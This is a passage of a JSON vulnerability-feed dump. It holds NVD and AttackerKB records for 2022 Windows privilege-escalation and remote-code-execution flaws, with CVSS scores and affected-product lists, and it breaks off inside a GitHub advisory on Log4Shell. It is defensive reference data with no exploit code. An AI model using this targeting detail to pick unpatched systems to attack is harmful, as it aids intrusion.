"cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-20T17:05:44", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30206.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-30226", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-20T15:58:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1809"], "id": "CVE-2022-30226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30226", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-15T21:09:17", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-35743.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T20:15:00", "type": "cve", "title": "CVE-2022-34713", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-12T17:32:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-34713", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-07-16T20:15:06", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22039.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22029", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22039"], "modified": "2022-07-16T18:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-22029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-07-16T20:15:04", "description": "Windows Network File System Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22029.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22039", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22039"], "modified": "2022-07-16T19:08:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-22039", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22039", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-09-16T20:40:30", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37969.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T19:15:00", "type": "cve", "title": "CVE-2022-35803", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-16T19:09:00", "cpe": ["cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-"], "id": "CVE-2022-35803", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-35803", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:azure:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-09-30T20:45:40", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-35803.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T19:15:00", "type": "cve", "title": "CVE-2022-37969", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-30T19:15:00", "cpe": ["cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-37969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37969", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:azure:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2022-10-08T22:25:53", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22047.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-22049", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T00:00:00", "id": "AKB:5FAD5EC2-E77A-4F4A-B3DC-61A700F1B059", "href": "https://attackerkb.com/topics/fIVjvZJTUN/cve-2022-22049", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-23T08:04:25", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-22047", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T00:00:00", "id": "AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "href": "https://attackerkb.com/topics/SzYymWZIy5/cve-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-31T14:39:22", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-35743.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-34713", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-09T00:00:00", "id": "AKB:06DA4012-8C8E-4534-A099-AE4F2449F9B3", "href": "https://attackerkb.com/topics/B3Zx5VDSPc/cve-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T05:01:18", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-35803.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-37969", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-13T00:00:00", "id": "AKB:48AB1318-D726-4F76-9889-74353FF980EF", "href": "https://attackerkb.com/topics/ZMtSR5b70g/cve-2022-37969", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2023-01-11T05:06:26", "description": "### Impact\nA highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.\n\nThis affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive). \n\nThis vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.\n\nAnother vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote 